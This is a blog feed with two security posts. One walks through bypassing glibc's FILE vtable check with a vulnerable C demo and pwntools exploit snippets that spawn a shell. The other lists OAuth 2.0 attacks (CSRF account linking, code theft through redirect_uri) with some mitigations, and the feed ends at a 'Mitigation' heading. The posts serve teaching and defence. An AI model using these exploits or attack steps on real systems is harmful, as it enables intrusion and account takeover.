Dhaval Kapil2018-01-13T01:29:22+00:00https://dhavalkapil.comDhaval Kapilme@dhavalkapil.comFILE Structure Exploitation ('vtable' check bypass)2018-01-12T00:00:00+00:00https://dhavalkapil.com/blogs/FILE-Structure-Exploitation<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>‘FILE’ structure exploitation is one of the common ways to gain control over execution flow. The attacker overwrites a ‘FILE’ pointer (say stdin, stdout, stderr or any other file handler opened by <code class="highlighter-rouge">fopen()</code>) to point to his/her own forged structure. This structure contains <code class="highlighter-rouge">vtable</code>, which is a pointer to a table which contains functions which are called when the original ‘FILE’ pointer is used to perform different operations (such as <code class="highlighter-rouge">fread</code>, <code class="highlighter-rouge">fwrite</code>, etc.). However, checks have recently been incorporated in <code class="highlighter-rouge">libc</code> that place a restriction on <code class="highlighter-rouge">vtable</code> to protect against most of the attacks.</p>
<p><a href="https://outflux.net/">Kees Cook</a> has written an informative article about ‘<a href="https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/">Abusing the FILE structure</a>’. This technique will no longer work in the patched libc. Another possible way to exploit the ‘FILE’ structure is to forge the <code class="highlighter-rouge">read</code>, <code class="highlighter-rouge">write</code> pointers instead of the <code class="highlighter-rouge">vtable</code>. This technique is highlighted by <a href="https://twitter.com/scwuaptx?">Angelboy</a> in his presentation: <a href="https://www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique">Play with FILE Structure - Yet Another Binary Exploit Technique</a>.</p>
<p>In this post, I’ll be describing the protection mechanism introduced recently in libc and a possible way to bypass it. We’ll not only get RIP control, but also control over the the first three parameters in RDI, RSI and RDX respectively. I’ll be only targeting the <code class="highlighter-rouge">vtable</code> pointer.</p>
<blockquote>
<h2 id="prerequisites">Prerequisites</h2>
</blockquote>
<p>It is assumed that the reader is familiar with the current <code class="highlighter-rouge">FILE</code> structure and the common (though now obsolete) attack on <code class="highlighter-rouge">vtable</code>. The following two resources (same as mentioned previously) are sufficient to get the necessary background:</p>
<ul>
<li><a href="https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/">Abusing the FILE structure</a></li>
<li><a href="https://www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique">Play with FILE Structure - Yet Another Binary Exploit Technique</a></li>
</ul>
<blockquote>
<h2 id="protection-mechanism">Protection mechanism</h2>
</blockquote>
<p>Two new functions have been <a href="https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=db3476aff19b75c4fdefbe65fcd5f0a90588ba51">added</a> to protect against tampering with the <code class="highlighter-rouge">vtable</code> pointer: <code class="highlighter-rouge">IO_validate_vtable</code> and <code class="highlighter-rouge">_IO_vtable_check</code>. Every vtable reference is first passed through <code class="highlighter-rouge">IO_validate_vtable</code> (which internally uses <code class="highlighter-rouge">_IO_vtable_check</code>). In case tampering is detected, the program aborts, otherwise the corresponding <code class="highlighter-rouge">vtable</code> pointer is returned.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
IO_validate_vtable
Source: https://code.woboq.org/userspace/glibc/libio/libioP.h.html#IO_validate_vtable
*/</span>
<span class="cm">/* Perform vtable pointer validation. If validation fails, terminate
the process. */</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">_IO_jump_t</span> <span class="o">*</span>
<span class="nf">IO_validate_vtable</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">_IO_jump_t</span> <span class="o">*</span><span class="n">vtable</span><span class="p">)</span>
<span class="p">{</span>
<span class="cm">/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */</span>
<span class="kt">uintptr_t</span> <span class="n">section_length</span> <span class="o">=</span> <span class="n">__stop___libc_IO_vtables</span> <span class="o">-</span> <span class="n">__start___libc_IO_vtables</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">vtable</span><span class="p">;</span>
<span class="kt">uintptr_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">ptr</span> <span class="o">-</span> <span class="n">__start___libc_IO_vtables</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">__glibc_unlikely</span> <span class="p">(</span><span class="n">offset</span> <span class="o">>=</span> <span class="n">section_length</span><span class="p">))</span>
<span class="cm">/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */</span>
<span class="n">_IO_vtable_check</span> <span class="p">();</span>
<span class="k">return</span> <span class="n">vtable</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The function checks whether the <code class="highlighter-rouge">vtable</code> pointer lies inside the <code class="highlighter-rouge">__libc_IO_vtables</code> section or not. If not, it further check the pointer by calling <code class="highlighter-rouge">_IO_vtable_check</code>. This section contains some vtables of the type <code class="highlighter-rouge">_IO_jump_t</code> (<a href="https://code.woboq.org/userspace/glibc/libio/libioP.h.html#_IO_jump_t">source</a>). The original <code class="highlighter-rouge">vtable</code> is also part of it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
_IO_vtable_check
Source: https://code.woboq.org/userspace/glibc/libio/vtables.c.html#_IO_vtable_check
*/</span>
<span class="kt">void</span> <span class="n">attribute_hidden</span>
<span class="nf">_IO_vtable_check</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="cp">#ifdef SHARED
</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">flag</span><span class="p">)</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span> <span class="n">atomic_load_relaxed</span> <span class="p">(</span><span class="o">&</span><span class="n">IO_accept_foreign_vtables</span><span class="p">);</span>
<span class="cp">#ifdef PTR_DEMANGLE
</span> <span class="n">PTR_DEMANGLE</span> <span class="p">(</span><span class="n">flag</span><span class="p">);</span>
<span class="cp">#endif
</span> <span class="k">if</span> <span class="p">(</span><span class="n">flag</span> <span class="o">==</span> <span class="o">&</span><span class="n">_IO_vtable_check</span><span class="p">)</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">{</span>
<span class="n">Dl_info</span> <span class="n">di</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">link_map</span> <span class="o">*</span><span class="n">l</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">_dl_open_hook</span> <span class="o">!=</span> <span class="nb">NULL</span>
<span class="o">||</span> <span class="p">(</span><span class="n">_dl_addr</span> <span class="p">(</span><span class="n">_IO_vtable_check</span><span class="p">,</span> <span class="o">&</span><span class="n">di</span><span class="p">,</span> <span class="o">&</span><span class="n">l</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span>
<span class="o">&&</span> <span class="n">l</span><span class="o">-></span><span class="n">l_ns</span> <span class="o">!=</span> <span class="n">LM_ID_BASE</span><span class="p">))</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#else </span><span class="cm">/* !SHARED */</span><span class="cp">
</span> <span class="k">if</span> <span class="p">(</span><span class="n">__dlopen</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span><span class="p">;</span>
<span class="cp">#endif
</span> <span class="n">__libc_fatal</span> <span class="p">(</span><span class="s">"Fatal error: glibc detected an invalid stdio handle</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<blockquote>
<h2 id="attack">Attack</h2>
</blockquote>
<p>In this attack, we will make the FILE’s <code class="highlighter-rouge">vtable</code> point to some other place (useful), which is already inside the <code class="highlighter-rouge">__libc_IO_vtables</code> section. This will pass the security check. I came across this attack while going through a CTF <a href="http://simp1e.leanote.com/post/Hctf-2017-babyprintf">writeup</a>. The <code class="highlighter-rouge">_IO_str_jumps</code> is also part of this section (<a href="https://code.woboq.org/userspace/glibc/libio/strops.c.html#_IO_str_jumps">source</a>). It contains a pointer to the function <code class="highlighter-rouge">_IO_str_overflow</code> which is useful for our purpose.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Source: https://code.woboq.org/userspace/glibc/libio/strops.c.html#_IO_str_overflow
*/</span>
<span class="n">_IO_str_overflow</span> <span class="p">(</span><span class="n">_IO_FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">,</span> <span class="kt">int</span> <span class="n">c</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">flush_only</span> <span class="o">=</span> <span class="n">c</span> <span class="o">==</span> <span class="n">EOF</span><span class="p">;</span>
<span class="n">_IO_size_t</span> <span class="n">pos</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">fp</span><span class="o">-></span><span class="n">_flags</span> <span class="o">&</span> <span class="n">_IO_NO_WRITES</span><span class="p">)</span>
<span class="k">return</span> <span class="n">flush_only</span> <span class="o">?</span> <span class="mi">0</span> <span class="o">:</span> <span class="n">EOF</span><span class="p">;</span>
<span class="k">if</span> <span class="p">((</span><span class="n">fp</span><span class="o">-></span><span class="n">_flags</span> <span class="o">&</span> <span class="n">_IO_TIED_PUT_GET</span><span class="p">)</span> <span class="o">&&</span> <span class="o">!</span><span class="p">(</span><span class="n">fp</span><span class="o">-></span><span class="n">_flags</span> <span class="o">&</span> <span class="n">_IO_CURRENTLY_PUTTING</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">fp</span><span class="o">-></span><span class="n">_flags</span> <span class="o">|=</span> <span class="n">_IO_CURRENTLY_PUTTING</span><span class="p">;</span>
<span class="n">fp</span><span class="o">-></span><span class="n">_IO_write_ptr</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_read_ptr</span><span class="p">;</span>
<span class="n">fp</span><span class="o">-></span><span class="n">_IO_read_ptr</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_read_end</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pos</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_write_ptr</span> <span class="o">-</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_write_base</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pos</span> <span class="o">>=</span> <span class="p">(</span><span class="n">_IO_size_t</span><span class="p">)</span> <span class="p">(</span><span class="n">_IO_blen</span> <span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="o">+</span> <span class="n">flush_only</span><span class="p">))</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">fp</span><span class="o">-></span><span class="n">_flags</span> <span class="o">&</span> <span class="n">_IO_USER_BUF</span><span class="p">)</span> <span class="cm">/* not allowed to enlarge */</span>
<span class="k">return</span> <span class="n">EOF</span><span class="p">;</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">new_buf</span><span class="p">;</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">old_buf</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_buf_base</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">old_blen</span> <span class="o">=</span> <span class="n">_IO_blen</span> <span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">_IO_size_t</span> <span class="n">new_size</span> <span class="o">=</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">old_blen</span> <span class="o">+</span> <span class="mi">100</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">new_size</span> <span class="o"><</span> <span class="n">old_blen</span><span class="p">)</span>
<span class="k">return</span> <span class="n">EOF</span><span class="p">;</span>
<span class="n">new_buf</span>
<span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_IO_strfile</span> <span class="o">*</span><span class="p">)</span> <span class="n">fp</span><span class="p">)</span><span class="o">-></span><span class="n">_s</span><span class="p">.</span><span class="n">_allocate_buffer</span><span class="p">)</span> <span class="p">(</span><span class="n">new_size</span><span class="p">);</span>
<span class="cm">/* ^ Getting RIP control !*/</span>
</code></pre></div></div>
<p>We shall overwrite the <code class="highlighter-rouge">vtable</code> in such a manner so that instead of calling the regular ‘FILE’ associated function, <code class="highlighter-rouge">_IO_str_overflow</code> would be called. Since we can already forge <code class="highlighter-rouge">fp</code>, we can control the execution flow, along with the first three parameters in this line:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="n">_IO_strfile</span> <span class="o">*</span><span class="p">)</span> <span class="n">fp</span><span class="p">)</span><span class="o">-></span><span class="n">_s</span><span class="p">.</span><span class="n">_allocate_buffer</span><span class="p">)</span> <span class="p">(</span><span class="n">new_size</span><span class="p">);</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">fp->_s._allocate_buffer</code> is at a fixed offset within <code class="highlighter-rouge">fp</code> and <code class="highlighter-rouge">new_size</code> is being calculated from the members of <code class="highlighter-rouge">fp</code>. The offset can be calculated by reversing the binary or through gdb. In my case, the offset was <code class="highlighter-rouge">0xe0</code>, which is directly after <code class="highlighter-rouge">vtable</code> pointer. <code class="highlighter-rouge">new_size</code> is calculated as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define _IO_blen(fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base)
</span><span class="kt">size_t</span> <span class="n">old_blen</span> <span class="o">=</span> <span class="n">_IO_blen</span> <span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="n">_IO_size_t</span> <span class="n">new_size</span> <span class="o">=</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">old_blen</span> <span class="o">+</span> <span class="mi">100</span><span class="p">;</span>
</code></pre></div></div>
<p>Hence, we can craft any ‘even’ value for <code class="highlighter-rouge">new_size</code> by setting appropriate <code class="highlighter-rouge">_IO_buf_end</code> and <code class="highlighter-rouge">_IO_buf_base</code>. For instance, if we want <code class="highlighter-rouge">new_size</code> to be equal to <code class="highlighter-rouge">x</code>, set <code class="highlighter-rouge">_IO_buf_base = 0</code> and <code class="highlighter-rouge">_IO_buf_end = (x - 100)/2</code>. However, we also have to pass a check before arriving at the particular call instruction:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">flush_only</span> <span class="o">=</span> <span class="n">c</span> <span class="o">==</span> <span class="n">EOF</span><span class="p">;</span>
<span class="n">pos</span> <span class="o">=</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_write_ptr</span> <span class="o">-</span> <span class="n">fp</span><span class="o">-></span><span class="n">_IO_write_base</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pos</span> <span class="o">>=</span> <span class="p">(</span><span class="n">_IO_size_t</span><span class="p">)</span> <span class="p">(</span><span class="n">_IO_blen</span> <span class="p">(</span><span class="n">fp</span><span class="p">)</span> <span class="o">+</span> <span class="n">flush_only</span><span class="p">))</span>
</code></pre></div></div>
<p><code class="highlighter-rouge">flush_only</code> is 0, so we want <code class="highlighter-rouge">pos >= _IO_blen(fp)</code>. This can be achieved by setting <code class="highlighter-rouge">_IO_write_ptr = (x - 100)/2</code> and <code class="highlighter-rouge">_IO_write_base = 0</code>.</p>
<p>Regarding the second and third parameters, let’s reverse the binary at assembly level and trace back the registers <code class="highlighter-rouge">rsi</code> and <code class="highlighter-rouge">rdx</code> before the call instruction:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov rdx, [rdi+28h]
mov rsi, rdx
sub rsi, [rdi+20h]
</code></pre></div></div>
<p><code class="highlighter-rouge">rdi + 0x28</code> matches with <code class="highlighter-rouge">fp->_IO_write_ptr</code>. <code class="highlighter-rouge">rdi + 0x20</code> matches with <code class="highlighter-rouge">_IO_write_base</code>. Note that we already have a restriction that <code class="highlighter-rouge">_IO_write_ptr - _IO_write_base</code> should be greater than or equal to <code class="highlighter-rouge">(rdi - 100)/2</code>. Hence, we cannot have arbitrary values for <code class="highlighter-rouge">rsi</code> and <code class="highlighter-rouge">rdx</code>.</p>
<p>Now, with this let’s try our own exploit. Consider the vulnerable code:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* gcc vuln.c -o vuln */</span>
<span class="cp">#include <stdio.h>
#include <unistd.h>
</span>
<span class="kt">char</span> <span class="n">fake_file</span><span class="p">[</span><span class="mh">0x200</span><span class="p">];</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">;</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Leaking libc address of stdout:"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stdout</span><span class="p">);</span> <span class="c1">// Emulating libc leak
</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Enter fake file structure"</span><span class="p">);</span>
<span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">fake_file</span><span class="p">,</span> <span class="mh">0x200</span><span class="p">);</span>
<span class="n">fp</span> <span class="o">=</span> <span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">fake_file</span><span class="p">;</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><a href="/assets/files/FILE-Structure-Exploitation/vuln.c">Here</a> is the link to the above mentioned code. You might want to work with the same <a href="/assets/files/FILE-Structure-Exploitation/vuln">binary</a> and <a href="/assets/files/FILE-Structure-Exploitation/libc.so.6">libc</a> that I used. I am running it on Ubuntu 16.04.</p>
<p>The program first simulates a leak of an address in libc. It then takes input in a global variable <code class="highlighter-rouge">fake_file</code> and points the file pointer <code class="highlighter-rouge">fp</code> to it. Next, it closes the file pointer using <code class="highlighter-rouge">fclose(fp)</code>.</p>
<p>The first step towards developing the exploit is to realize the target that we want to achieve. Namely, calling <code class="highlighter-rouge">system("/bin/sh")</code>. I shall be using <a href="https://github.com/Gallopsled/pwntools">pwntools</a> library. The binary comes with a libc leak, making it easier for us to calculate the address of <code class="highlighter-rouge">system</code> and the string <code class="highlighter-rouge">/bin/sh</code> within the libc.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">rip</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="n">rdi</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="nb">next</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">))</span>
</code></pre></div></div>
<p>Our next step is to point <code class="highlighter-rouge">vtable</code> to some address, such that, <code class="highlighter-rouge">fclose</code> will actually call <code class="highlighter-rouge">_IO_str_overflow</code>. I used gdb to find the relative offset of a pointer to <code class="highlighter-rouge">_IO_str_overflow</code> from <code class="highlighter-rouge">_IO_file_jumps</code>, which apparently is <code class="highlighter-rouge">0xd8</code> for the provided libc. Now, if I point the <code class="highlighter-rouge">vtable</code> to <code class="highlighter-rouge">0x10</code> bytes before it, <code class="highlighter-rouge">fclose</code> will call <code class="highlighter-rouge">_IO_str_overflow</code> (again from gdb).</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">io_str_overflow_ptr_addr</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'_IO_file_jumps'</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0xd8</span>
<span class="c"># Calculate the vtable by subtracting appropriate offset</span>
<span class="n">fake_vtable_addr</span> <span class="o">=</span> <span class="n">io_str_overflow_ptr_addr</span> <span class="o">-</span> <span class="mi">2</span><span class="o">*</span><span class="mi">8</span>
</code></pre></div></div>
<p>Next, we can craft our fake ‘FILE’ structure by setting appropriate <code class="highlighter-rouge">vtable</code> and also other pointers so as to call <code class="highlighter-rouge">rip</code> with <code class="highlighter-rouge">rdi</code> as a parameter.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Craft file struct</span>
<span class="n">file_struct</span> <span class="o">=</span> <span class="n">pack_file</span><span class="p">(</span><span class="n">_IO_buf_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">_IO_buf_end</span> <span class="o">=</span> <span class="p">(</span><span class="n">rdi</span><span class="o">-</span><span class="mi">100</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">,</span>
<span class="n">_IO_write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="n">rdi</span><span class="o">-</span><span class="mi">100</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">,</span>
<span class="n">_IO_write_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">_lock</span> <span class="o">=</span> <span class="nb">bin</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'fake_file'</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x80</span><span class="p">)</span>
<span class="c"># vtable pointer</span>
<span class="n">file_struct</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">fake_vtable_addr</span><span class="p">)</span>
<span class="c"># (*((_IO_strfile *) fp)->_s._allocate_buffer)</span>
<span class="n">file_struct</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rip</span><span class="p">)</span>
<span class="n">file_struct</span> <span class="o">=</span> <span class="n">file_struct</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>
<p>Note that we also have to set <code class="highlighter-rouge">fp->_lock</code> to an address pointing to <code class="highlighter-rouge">NULL</code> to prevent <code class="highlighter-rouge">fclose</code> waiting on someone else for releasing the lock. The complete exploit can be downloaded <a href="/assets/files/FILE-Structure-Exploitation/exploit.py">here</a>.</p>
<p><em>Note</em>: Another possible function (instead of <code class="highlighter-rouge">_IO_str_overflow</code>) that one could use is <code class="highlighter-rouge">_IO_wstr_finish()</code> as seen in this <a href="http://blog.rh0gue.com/2017-12-31-34c3ctf-300/">post</a> by Josh Wang.</p>
<blockquote>
<h2 id="conclusion">Conclusion</h2>
</blockquote>
<p>Given that an attacker has control over a few fields of the ‘FILE’ structure(for <code class="highlighter-rouge">rdi</code>), the <code class="highlighter-rouge">vtable</code> pointer and 8 bytes after it (for <code class="highlighter-rouge">rip</code>), the additional check on <code class="highlighter-rouge">vtable</code> offers not much protection.</p>
Attacking the OAuth Protocol2017-02-17T00:00:00+00:00https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol<p>This post is about developing a secure OAuth 2.0 server, the inherent weaknesses of the protocol, and their mitigation.</p>
<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>Recently, I had the opportunity to mentor a fellow student at <a href="https://sdslabs.co/">SDSLabs</a> on a project related to the OAuth 2.0 protocol. It was then that I decided to read the official <a href="https://tools.ietf.org/html/rfc6749">manual</a> for OAuth 2.0. It took me a few hours to go through the entire document and analyze it.</p>
<p>The OAuth 2.0 protocol itself is <strong>insecure</strong>. The document specifies some security measures that are <strong>optional</strong> (which boils down to <strong>missing</strong> for the casual developer). Apart from that, there are additional loopholes as well. Herein, I try to enumerate the various vulnerabilities of the OAuth 2.0 protocol which I found after reading the standard and a couple of online resources. I suggest mitigation to each of these which might be either following the standard strictly or even changing the standard slightly.</p>
<p>This is aimed to benefit both: developers working with OAuth 2.0 as well as security researchers.</p>
<blockquote>
<h2 id="overview">Overview</h2>
</blockquote>
<p>I’ll be assuming that the reader is familiar with the OAuth 2.0 protocol. There are tons of online <a href="https://aaronparecki.com/oauth-2-simplified/">resources</a> to read up on this. The reader should also be familiar with basic attacks like <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">CSRF</a>, <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">XSS</a> and <a href="http://whatis.techtarget.com/definition/open-redirect">open redirect</a>. I’ll be mainly focussing on the <em>Authorization code grant</em> and a little on the <em>Implicit grant</em>. As a refresher, these are the steps involved in an <em>Authorization code grant</em>:</p>
<ol>
<li>
<p>The user requests the client to start the authorization process through the user-agent by issuing a GET request. This happens when the user clicks on ‘Connect’/’Sign in with’ button on the client’s website.</p>
</li>
<li>The client redirects the user-agent to the authorization server using the following query parameters:
<ul>
<li><strong>response_type</strong>: <em>code</em></li>
<li><strong>client_id</strong>: The <em>id</em> issued to the client.</li>
<li><strong>redirect_uri</strong>(optional): The URI where the authorization server will redirect the response to.</li>
<li><strong>scope</strong>(optional): The scope to be requested.</li>
<li><strong>state</strong>(recommended): An opaque value to maintain state between the request and callback.</li>
</ul>
</li>
<li>After the user authenticates and grants authorization for requested resources, the authorization server redirects the user-agent to the <em>redirect_uri</em> with the following query parameters:
<ul>
<li><strong>code</strong>: The authorization code.</li>
<li><strong>state</strong>: The value passed in the above request.</li>
</ul>
</li>
<li>The client further uses the <em>authorization code</em> to request for an access token(with appropriate client authentication) using the following parameters in the request body:
<ul>
<li><strong>grant_type</strong>: <em>authorization_code</em></li>
<li><strong>code</strong>: The authorization code received earlier.</li>
<li><strong>redirect_uri</strong>: The <em>redirect_uri</em> passed in the first request.</li>
</ul>
</li>
</ol>
<blockquote>
<h2 id="attacks">Attacks</h2>
</blockquote>
<p>Now, I’m going to talk about various attacks possible by modifying the above-mentioned requests. I’ll be specifying the assumptions in each of the cases separately.</p>
<blockquote>
<h3 id="attacking-the-connect-request">Attacking the ‘Connect’ request</h3>
</blockquote>
<p>This attack exploits the first request mentioned above, i.e. the request generated when a user clicks ‘Connect’ or ‘Sign in with’ button. Many websites allow users to connect additional accounts like Google, Facebook, Twitter, etc. using OAuth. An attacker can gain access to the victim’s account on the Client by connecting one of his/her own account(on the Provider).</p>
<p><strong>Steps</strong>:</p>
<ol>
<li>
<p>The attacker creates a dummy account with some Provider.</p>
</li>
<li>
<p>The attacker initiates the ‘Connect’ process with the Client using the dummy account on the Provider, but, stops the redirect mentioned in request 3(in the Authorization code grant flow). i.e. The attacker has granted <em>Client</em> access to his/her resources on the <em>Provider</em> but the <em>Client</em> has not yet been notified.</p>
</li>
<li>The attacker creates a malicious webpage simulating the following steps:
<ul>
<li>Logging out the user on Provider(using CSRF).</li>
<li>Logging in the user on Provider with the credentials of his/her dummy account(using CSRF).</li>
<li>Spoofing the 1st request to connect the <em>Provider</em> account with <em>Client</em>. This can be easily done, as it is just another <em>GET</em> request. It is preferred to do this within an iframe so that the victim is unaware of this.</li>
</ul>
</li>
<li>
<p>When the victim visits the attacker’s page, he/she is logged out of <em>Provider</em> and then gets signed in as the <em>dummy account</em>. The ‘Connect’ request is then issued which results in the attacker’s dummy account to be connected with the victim’s account on <em>Client</em>. Note that the victim will not be asked for granting access to the client as the attacker has already approved it in Step 2.</p>
</li>
<li>Now, the attacker can log in to the victim’s account on <em>Client</em> by signing in with the dummy account on <em>Provider</em>.</li>
</ol>
<p><strong>Mitigation</strong></p>
<p>Although the vulnerability exists on the Provider itself(allowing CSRF log in and log out), it is even better to protect the ‘Connect’ page from allowing requests that do not originate from the user. This can be ensured by using a <em>csrf_token</em> within the client to protect the 1st request. The OAuth 2.0 standard should specify this.</p>
<blockquote>
<h3 id="attacking-redirect_uri">Attacking ‘redirect_uri’</h3>
</blockquote>
<p>Presently, to prevent attackers using arbitrary <em>redirect_uri</em>, many OAuth servers partially match this parameter with a <em>redirect_uri</em> prespecified during client registration. Generally, during registration, the client specifies the domain and only those <em>redirect_uri</em> on that particular domain are allowed. This becomes dangerous when an attacker is able to find a page vulnerable, to say XSS, on the client’s domain. The attacker can subsequently steal <em>authorization_code</em>.</p>
<p><strong>Steps</strong>:</p>
<ol>
<li>
<p>The attacker is able to leak data(say through XSS) from a page on the client’s domain: <code class="highlighter-rouge">https://client.com/vuln</code>.</p>
</li>
<li>
<p>The attacker injects Javascript code(if XSS) on that page that sends the URL loaded in the browser(with parameters as well as fragments) to the attacker.</p>
</li>
<li>
<p>The attacker creates a webpage that forces the user to visit a malicious link such as:
<code class="highlighter-rouge">https://provider.com/oauth/authorize?client_id=CLIENT_ID&response_type=code&redirect_uri=https%3A%2F%2Fclient.com%2Fvuln</code></p>
</li>
<li>
<p>When the victim loads this link, the user-agent is redirected to <code class="highlighter-rouge">https://client.com/vuln?code=CODE</code>. This <code class="highlighter-rouge">CODE</code> is then sent to the attacker.</p>
</li>
<li>
<p>The attacker can use this code at his/her end to issue an access token by passing it to the authentic <em>redirect_uri</em> such as <code class="highlighter-rouge">https://client.com/oauth/callback?code=CODE</code>.</p>
</li>
</ol>
<p>This attack is even more dangerous if the authorization server supports the <em>Implicit grant</em>. By passing <code class="highlighter-rouge">response_type=token</code>, the attacker can steal the token directly.</p>
<p><strong>Mitigation</strong></p>
